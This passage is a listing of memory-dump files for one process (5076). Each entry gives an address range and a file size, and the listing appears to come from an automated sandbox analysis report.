                              • memory/5076-35-0x00000000089C0000-0x00000000089FC000-memory.dmp
                                Filesize

                                240KB

                              • memory/5076-16-0x0000000007E40000-0x0000000007E8B000-memory.dmp
                                Filesize

                                300KB

                              • memory/5076-15-0x0000000007920000-0x000000000793C000-memory.dmp
                                Filesize

                                112KB

                              • memory/5076-14-0x0000000007540000-0x0000000007890000-memory.dmp
                                Filesize

                                3.3MB

                              • memory/5076-73-0x000000007E9D0000-0x000000007E9E0000-memory.dmp
                                Filesize

                                64KB

                              • memory/5076-277-0x0000000009A80000-0x0000000009A9A000-memory.dmp
                                Filesize

                                104KB

                              • memory/5076-13-0x00000000074D0000-0x0000000007536000-memory.dmp
                                Filesize

                                408KB

                              • memory/5076-11-0x0000000006B90000-0x0000000006BB2000-memory.dmp
                                Filesize

                                136KB

                              • memory/5076-12-0x0000000006D10000-0x0000000006D76000-memory.dmp
                                Filesize

                                408KB

                              • memory/5076-10-0x0000000006EA0000-0x00000000074C8000-memory.dmp
                                Filesize

                                6.2MB

                              • memory/5076-8-0x0000000000920000-0x0000000000930000-memory.dmp
                                Filesize

                                64KB

                              • memory/5076-9-0x0000000000920000-0x0000000000930000-memory.dmp
                                Filesize

                                64KB

                              • memory/5076-7-0x00000000732F0000-0x00000000739DE000-memory.dmp
                                Filesize

                                6.9MB

                              • memory/5076-6-0x0000000000930000-0x0000000000966000-memory.dmp
                                Filesize

                                216KB

                              • memory/5076-282-0x0000000009A60000-0x0000000009A68000-memory.dmp
                                Filesize

                                32KB

                              • memory/5076-300-0x00000000732F0000-0x00000000739DE000-memory.dmp
                                Filesize

                                6.9MB